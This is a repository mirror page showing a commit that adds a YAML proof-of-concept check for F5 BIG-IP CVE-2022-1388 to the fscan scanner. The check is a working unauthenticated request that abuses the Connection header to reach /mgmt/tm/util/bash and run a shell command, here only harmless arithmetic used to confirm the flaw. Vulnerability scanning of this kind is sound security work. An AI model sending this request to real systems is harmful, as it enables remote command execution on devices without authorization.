qwqdanchun
/
fscan
mirror of https://github.com/qwqdanchun/fscan.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #174 from jindaxia/main 

poc: add f5 big-ip cve-2022-1388 poc
This commit is contained in:
影舞者 2022-05-19 17:43:17 +08:00 committed by GitHub
parent 11fb239c61 85e636fcea
commit cf9389e879
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 21 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

21
WebScan/pocs/f5-cve-2022-1388.yml Normal file
View File

@ -0,0 +1,21 @@
name: poc-yaml-f5-cve-2022-1388
set:
r1: randomInt(800000000, 1000000000)
r2: randomInt(800000000, 1000000000)
rules:
- method: POST
path: /mgmt/tm/util/bash
headers:
Content-Type: application/json
Connection: keep-alive, x-F5-Auth-Token
X-F5-Auth-Token: a
Authorization: Basic YWRtaW46
body: >-
{"command":"run","utilCmdArgs":"-c 'expr {{r1}} + {{r2}}'"}
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
detail:
author: jindaxia
links:
- https://support.f5.com/csp/article/K23605346